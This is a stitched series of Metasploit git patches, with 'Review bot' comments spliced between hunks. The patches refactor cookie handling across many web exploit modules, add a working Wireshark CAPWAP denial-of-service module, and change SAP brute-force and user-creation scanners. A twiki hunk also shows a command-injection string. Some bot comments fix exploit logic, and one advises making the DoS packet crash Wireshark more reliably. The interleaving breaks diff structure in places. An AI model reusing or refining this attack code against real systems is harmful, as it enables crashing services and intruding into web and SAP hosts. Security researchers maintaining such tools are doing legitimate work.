files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb 
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb 
@@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") 
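Review bot: In lifesize_room.rb the new guard `res.nil? || res.get_cookies.empty?` only rejects an empty cookie string, but the next line still does `split('PHPSESSID=')[1].split('; ')[0]`, which raises `NoMethodError` on `nil` whenever cookies are present without `PHPSESSID`, so the `fail_with(Failure::NotFound, ...)` is never reached in that case. Matching the session id directly covers both: `m = res && res.get_cookies.match(/PHPSESSID=([^;]+)/)`, `fail_with(Failure::NotFound, 'Could not obtain a Session ID') unless m`, `sessionid = "PHPSESSID=#{m[1]}"`. The enclosing method continues outside the hunk.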
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb 
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /
/).flatten[0] || '' - cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || '' + cookie = res.get_cookies.scan(/nagiosxi=(\w+); /).flatten[0] || '' return nsp, cookie end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a795414f59..d563f00ad0 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/ + if res && res.code == 200 and res.get_cookies =~ /OpenEMR=([a-zA-Z0-9]+)/ session = $1 print_status("#{rhost}:#{rport} - Login successful") print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 2ee3f4a4b5..591fcc8ba0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote return end token = $1 - cookie = response["Set-Cookie"] + cookie = response.get_cookies # There is probably a great deal of randomization that can be done with # this format. diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 1a91c5763e..ad723c98d9 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -112,10 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "user=#{user}&pass=#{pass}", }, 25) - if (res) + if res print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /my_id=(.*)/) + if res.get_cookies =~ /my_id=(.*)/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session 
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e9116a64bd..cacbeb0e67 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -95,12 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }) - if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] + if res.nil? or res.headers['Location'] =~ /action=Login/ or res.get_cookies.empty? print_error("#{peer} - Login failed with \"#{username}:#{password}\"") return end - if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ + if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]*); path/ session_id = $1 else print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 133b26b8a0..096f669368 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status "We received the expected HTTP code #{target_code}" # We will need the cookie PHPSESSID to continue - cookies = response.headers['Set-Cookie'] + cookies = response.get_cookies # Make sure cookies were set if defined? cookies and cookies =~ PHPSESSID_REGEX @@ -145,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status "The server responded to POST with HTTP code #{delivery_response.code}" # We will need the cookie PHPSESSID to continue - cookies = delivery_response.headers['Set-Cookie'] + cookies = delivery_response.get_cookies # Make sure cookies were set if cookies.nil? diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 5a931d0f21..47bcba11be 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb 
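Review bot: In sugarcrm_unserialize_exec.rb the regex `/PHPSESSID=([A-Za-z0-9]*); path/` is kept while its input switches from the raw `Set-Cookie` header to `res.get_cookies`; as far as I know Rex's `get_cookies` rebuilds the value as `name=value; ` pairs and drops attributes such as `path`, so the `; path` suffix no longer appears and every login would end in the `(No session ID)` branch. Match on the cookie alone: `if res.get_cookies =~ /PHPSESSID=([A-Za-z0-9]+)/`. Other hunks in this commit that anchor only on `;` or the bare name (webmin, zpanel, solarwinds) look unaffected. The enclosing method continues outside the hunk.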
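Review bot: In trixbox_langchoice.rb the second hunk keeps `if cookies.nil?` after `cookies = delivery_response.get_cookies`; `get_cookies` returns a String (empty when nothing was set), so the nil check is dead and a missing session cookie is no longer detected — use `if cookies.empty?`. The first hunk's context line `if defined? cookies and cookies =~ PHPSESSID_REGEX` has the same shape: `defined?` on a local that was just assigned is always truthy, so `if cookies =~ PHPSESSID_REGEX` expresses the check on its own. Both enclosing methods continue outside the hunks.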
+++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/ return nil end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("crypttoken found: #{crypttoken}") if session.empty? - if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -225,4 +225,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end \ No newline at end of file +=end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 4d27bc797b..9194c0958b 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie'] + if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and !res.get_cookies.empty? session = res.get_cookies else return nil diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 9de059083a..b118f8867f 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb 
@@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ + if res and res.code == 302 and res.get_cookies =~ /sid/ vprint_good "#{peer} - Authentication successful" - session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0] + session = res.get_cookies.split("sid=")[1].split(";")[0] else vprint_error "#{peer} - Service found, but authentication failed" return Exploit::CheckCode::Detected @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/ - session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || '' + if res and res.code == 302 and res.get_cookies =~ /sid/ + session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? print_good "#{peer} - Authentication successfully" else diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index d52ecda3a8..917730eeac 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -215,11 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end - admin_cookie = '' - (res.headers['Set-Cookie'] || '').split(',').each do |cookie| - admin_cookie << cookie.split(';')[0] - admin_cookie << ';' - end + admin_cookie = res.get_cookies if admin_cookie.empty? fail_with(Failure::UnexpectedReply, 'The resulting cookie was empty') diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index e4508a5448..6191617631 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb 
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed") end - res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' + res.get_cookies.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || '' end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res token = res.body.scan(//).flatten[0] || '' - sid = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' + sid = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || '' fail_with(Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty? return token, sid diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 1590d1ba62..4b4422ebd1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -74,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', }, 5) - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) - sessionid = res.headers['Set-Cookie'].split(';')[0] + if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i) + sessionid = res.get_cookies data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index d583cd0285..53660c9e7e 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb 
@@ -187,8 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote # Pick up the cookie, example: # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB - if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/ - cookie = "JSESSIONID=#{$1}" + if res and res.get_cookies =~ /JSESSIONID=(\w+);/ + cookie = res.get_cookies else print_error("Unable to get a session ID") return From df97c66ff5b8013026b557071529061bbde46349 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 24 May 2014 00:37:52 +0200 Subject: [PATCH 29/47] Fixed check --- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 160a553278..e6068cdaba 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.get_cookies + if res and !res.get_cookies.empty? cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") From 71e2d19040df63bf51b1f123532cc6bcc4f00b8b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 24 May 2014 18:53:10 +0100 Subject: [PATCH 30/47] Adapted to auxiliary modules structure --- modules/auxiliary/dos/wireshark/capwap.rb | 54 +++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/capwap.rb diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb new file mode 100644 index 0000000000..12feb83d96 --- /dev/null +++ b/modules/auxiliary/dos/wireshark/capwap.rb 
@@ -0,0 +1,54 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Udp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DisclosureDate' => 'Apr 28 2014')) + + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def run + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # the dissector crash + # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt + # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 + buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15) + udp_sock.put(buf) + + disconnect_udp + + end +end From 9f166b87f6479b5639862cb8ea99fcd8c332e87d Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 24 May 2014 18:58:36 +0100 Subject: [PATCH 31/47] Changed the description --- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 12feb83d96..6555ab5dcf 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb 
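Review bot: The trigger packet in `run` randomises its first three bytes with `Rex::Text.rand_text(3)`, which in a CAPWAP header cover the preamble (version/type) and the HLEN/RID/WBID fields, so only the flag byte at offset 3 is actually controlled by the `0x90` comment. If the dissector branches on the preamble type (plain versus DTLS-encapsulated) before it reaches the flag handling, a random preamble may route some packets away from the vulnerable path and make the DoS non-deterministic; pinning byte 0, e.g. `buf = "\x00" + Rex::Text.rand_text(2) + "\x90" + Rex::Text.rand_text(15)`, would be safer. The deleted sibling module sent a fixed `"\x90" * 18`, so the randomisation is new and a comment stating which field is intentionally malformed (presumably the F/M flags with a truncated body) would help the next reader. The module gives no feedback after `udp_sock.put`, which is expected for a one-shot sniffer crash but worth saying in the status line.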
+++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Exploit and msf module + 'j0sm1', # Auxiliary msf module 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => From da0a9f66ea93307cf2985dab3f75cf5611932cc8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 25 May 2014 19:29:39 +0200 Subject: [PATCH 32/47] Resolved all msftidy vars_get warnings --- lib/rex/proto/http/client_request.rb | 10 +++++-- .../scanner/sap/sap_soap_bapi_user_create1.rb | 16 +++++++---- .../scanner/sap/sap_soap_rfc_brute_login.rb | 15 ++++++---- ...fc_dbmcli_sxpg_call_system_command_exec.rb | 10 +++++-- .../sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 10 +++++-- .../scanner/sap/sap_soap_rfc_ping.rb | 17 ++++++----- .../scanner/sap/sap_soap_rfc_read_table.rb | 17 +++++------ .../sap_soap_rfc_susr_rfc_user_interface.rb | 17 ++++++----- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 14 ++++++---- .../sap/sap_soap_rfc_sxpg_command_exec.rb | 8 ++++-- .../scanner/sap/sap_soap_rfc_system_info.rb | 8 ++++-- .../sap/sap_soap_th_saprel_disclosure.rb | 10 +++++-- .../linux/http/openfiler_networkcard_exec.rb | 8 ++++-- .../linux/http/sophos_wpa_iface_exec.rb | 26 ++++++++++++----- .../linux/http/zen_load_balancer_exec.rb | 14 ++++++---- .../multi/http/hyperic_hq_script_console.rb | 12 ++++++-- .../multi/http/openfire_auth_bypass.rb | 28 +++++++++++-------- .../http/adobe_robohelper_authbypass.rb | 18 ++++++------ .../http/desktopcentral_file_upload.rb | 14 +++++++--- .../windows/http/hp_nnm_ovalarm_lang.rb | 9 ++++-- .../exploits/windows/http/sybase_easerver.rb | 11 +++++--- .../windows/http/zenworks_uploadservlet.rb | 21 +++++++------- .../lib/rex/proto/http/client_request_spec.rb | 6 ++++ 23 files changed, 206 insertions(+), 113 deletions(-) 
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2758d8fa77..4336909510 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -112,12 +112,16 @@ class ClientRequest opts['vars_get'].each_pair do |var,val| var = var.to_s - val = val.to_s qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - qstr << '=' - qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + # support get paraemter without value + # Example: uri?parameter + if val + val = val.to_s + qstr << '=' + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) + end end if (opts['pad_post_params']) diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 7a9535e6a9..ca96bb83eb 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -70,17 +70,21 @@ class Metasploit4 < Msf::Auxiliary data << '' begin print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'") + res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } }) if res and res.code == 200 if res.body =~ /
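Review bot: `if val` in the new `vars_get` loop drops the `=` for `false` as well as for `nil`, so a caller passing a boolean false now emits `name` where the old code emitted `name=false`; `unless val.nil?` restricts the new no-value form to nil, which is what the comment and the spec in this commit describe. The comment also has a typo and could state the contract: `# support GET parameter without value (nil): uri?parameter`. The enclosing method begins and ends outside the hunk.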

Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index d19a43b7c7..142697e92b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -118,16 +118,19 @@ class Metasploit4 < Msf::Auxiliary data << '' begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(username, password), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } }) if res and res.code == 200 report_auth_info( diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index 72460a04fc..c20283e921 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb 
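Review bot: Moving `sap-client` into `vars_get` changes how `datastore['CLIENT']` reaches the wire: with `encode_params` at its default the value is percent-encoded by the client, and a nil option now silently produces `sap-client` with no value where the old string concatenation raised. That is harmless for the usual three-digit client, but the `'cookie'` line above still interpolates the raw `datastore['CLIENT']`, so the same value is now emitted twice through different paths; a one-line comment that `sap-client` is deliberately sent both as a query parameter and inside `sap-usercontext` would stop a later clean-up from dropping one. The same pattern is repeated in every SAP module of this commit. Unrelated to the change but visible in context, `print_status` echoes `BAPI_PASSWORD` in clear text; `vprint_status` or masking would be more appropriate.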
@@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index b8ec123d75..fc110dbd7b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ 